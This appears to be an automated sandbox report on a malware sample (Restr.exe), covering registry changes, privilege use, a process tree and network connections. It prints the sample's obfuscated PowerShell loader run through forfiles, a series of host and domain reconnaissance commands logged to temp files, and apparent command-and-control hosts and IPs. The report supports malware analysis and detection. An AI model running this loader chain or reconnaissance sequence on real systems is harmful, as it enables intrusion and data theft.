| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000a66e371bb720c51e3ce959f7d76bb8c3cdb54906ddbacd6d16db9979ca8ee8fa000000000e800000000200002000000004b2a81af273a64ddc93af4aaa6f1741e55ca8e7ecb1b47489aad81f732e0205c0000000c1f9028bd43c6aab06677e5630a882416d5ecf594f78ce11bb4c7923d0cc945b015466f8e51f0eebadb06f225dd20801fb75bc06aada4047ce0c0b6b94a26fe7b7521eb0939e853f0e4c4534a8330afa77b05b9c674f7ae16c976509c0a5f253be1f71376005c18e943fe2cdf0449867f0de57d66c9983a2dbac1641bb19d0f6ff8b83536d8555b7f15507f68f55b707ea684b69deba8d1e18914d13d00d54f582e00c836065ad39d3093e75418b58bf996b600f7f54f9c94acf72a991a1f90f400000000e708e0f62d9f0fe62c53eb447fa000d062a052fcaf6e7dc4811e627bbc9696165c7c7723fca50b823d0c92ed7dda40a63d46d1f2565fe9605bc7f37542b1b31 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947395" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000001f0aae9c0cd96dd491fc79ea15f0f6b636f967a6f3e23a18a441c4f3b0700d29000000000e800000000200002000000030a6ccf90c261a9482e7b4eedd1a54fa7bf5c252b59730b66240bf4ca554439ac00000009b6104ba8a136c318627f726fe926fa27afe30b366686bafc68e78b1b2a2132075e1d95790f16752f40207991ff7660d0694967f433347839165e8ab49734d841ff3735b4f36f968769a95996862c954c0302d109461a8b60a7703e5ef06ff67fa7dfec1876f9f9de6bd4d6c64cd3a462e6ac9acd58bfa6df8ab3f4a7e30be5b18ba8b378c44ed254394a86d22964cd4f297d4f296594c1fd3d0ad752e1f75be53ad75961b05f64646fdd98dd383bb4c6ebeb952130f00349d0cdfa782e2a2de400000003b47780404277f566799d740c110b41ce78ba25f81f641c2525b308b772869bc5c9ea86d3b67489239ed8827e40e915281086f4450d75b62ba9ec69759879750 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000dab01f0f7faab4215f0fcb8b440aa7fe3462ab84531a7e991078e12322072e96000000000e800000000200002000000066f74c5f8304307b95bcb2799d4aa71384ea31b06948dda581989f0f3f73620fc0000000212ed449ae5d1b9a6ec1de03d13106297abfea4735369036b56e487aa036316c1256bc6d0b418a08b0e4c60b09c498a9d59160251f7a8e455bfde4c620e2fe70b2f144789ea683cfa5ed534706285fb43bec4e243c3e7dcfb1f6e3e1b54293543b34ff6a82ca84e9e4f66d4ccd7b72dfa50275a4d176e4c39382dca21eece1f0731a213e19312d6182ecf8c85ea6e26075cb1267dbb6ae952633120216c79f3fff6a627f5f9cb1ed801920a346f87adf7cd20f1f54f5254d9930b71c902d4086400000007ed9abcba78840c86d9f40c12c1be9a627f825e5fbbd6fb78fea9301c6e0bd1928dffe8f87d3565e508b3acf3294883c92f00226b0cfce0b58fda69926825808 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000411587c25fe2549f47ac2ac20e6f02c2d12e2e48d4f22792472c74a43ec7d78b000000000e800000000200002000000088cb7284ad731794a44ee084fa73c72f4c7338652efa5b2eec4666fe23b1e1f0c00000009d93904ecaaad13abbf02c36ccad44b328e7b4c97957f2f7bbbbb8c6b6f368729bfbd3117aaf84d358ec421d1f313dd91780fa5dfefa28260e87f5f401955b0ab2ea80fbe028949043da6502a0f9ac30025034237511fdbd5a90a1a7bd8474eaca17673282739409211b3f61438b5403670e140d21be409f7fd95225268f0dc265aeda3c5bc9fb42570bde13b56213494b074f84e5793637cf82e13983e6ab832cd13d67094430c3c50b623e208c5b3b4d1a46cd39c4e130d78c3e63ca8c3e3e40000000a6f09b7d58a33e4e1cf57008065497942cbe53dbe2316009d86aa8245f160d2594e8c44028950d7ad387b82a8e5ad8eb8e81c243c22c0d5610f3cceb64e544eb | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2317671783" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80997d7c4338d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Restr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Restr.exe
"C:\Users\Admin\AppData\Local\Temp\Restr.exe"
C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:17410 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82950 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82954 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:17412 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82960 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82964 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82968 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82972 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82976 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82980 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2420 CREDAT:82984 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\cmd.exe
/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA==
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q2nnynnq\q2nnynnq.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC14A.tmp" "c:\Users\Admin\AppData\Local\Temp\q2nnynnq\CSCB276EDCFA1D54AF48A876186B9A9B79.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gx2uheqz\gx2uheqz.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC215.tmp" "c:\Users\Admin\AppData\Local\Temp\gx2uheqz\CSCE43D2439906A4DEB84F6BE8B83451D.TMP"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4376 -ip 4376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 964
C:\Windows\system32\cmd.exe
cmd /C "net session" >> C:\Users\Admin\AppData\Local\Temp\5B1B.bin0
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5B1B.bin0 > C:\Users\Admin\AppData\Local\Temp\5B1B.bin & del C:\Users\Admin\AppData\Local\Temp\5B1B.bin0"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 1" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "net view" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 2" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 3" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "whoami /all" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\whoami.exe
whoami /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 4" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "net localgroup administrators" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 5" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\net.exe
net group "domain computers" /domain
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "domain computers" /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 6" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 7" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 8" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 9" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\8482.bin0 > C:\Users\Admin\AppData\Local\Temp\8482.bin & del C:\Users\Admin\AppData\Local\Temp\8482.bin0"
C:\Windows\system32\cmd.exe
cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\268A.bin0
C:\Windows\system32\net.exe
net group "domain computers" /domain
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "domain computers" /domain
C:\Windows\syswow64\svchost.exe
C:\Windows\syswow64\svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gogojoob.xyz | udp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 67.26.111.254:80 | tcp | |
| NL | 67.26.111.254:80 | tcp | |
| NL | 67.26.111.254:80 | tcp | |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| FI | 95.217.135.250:443 | tcp | |
| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |
| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |
| NL | 45.137.184.31:80 | 45.137.184.31 | tcp |
| RU | 93.95.100.166:80 | 93.95.100.166 | tcp |
| JP | 172.104.79.222:80 | 172.104.79.222 | tcp |
| US | 209.141.45.189:80 | 209.141.45.189 | tcp |
| RU | 93.95.100.166:80 | 93.95.100.166 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| US | 209.141.45.189:80 | 209.141.45.189 | tcp |
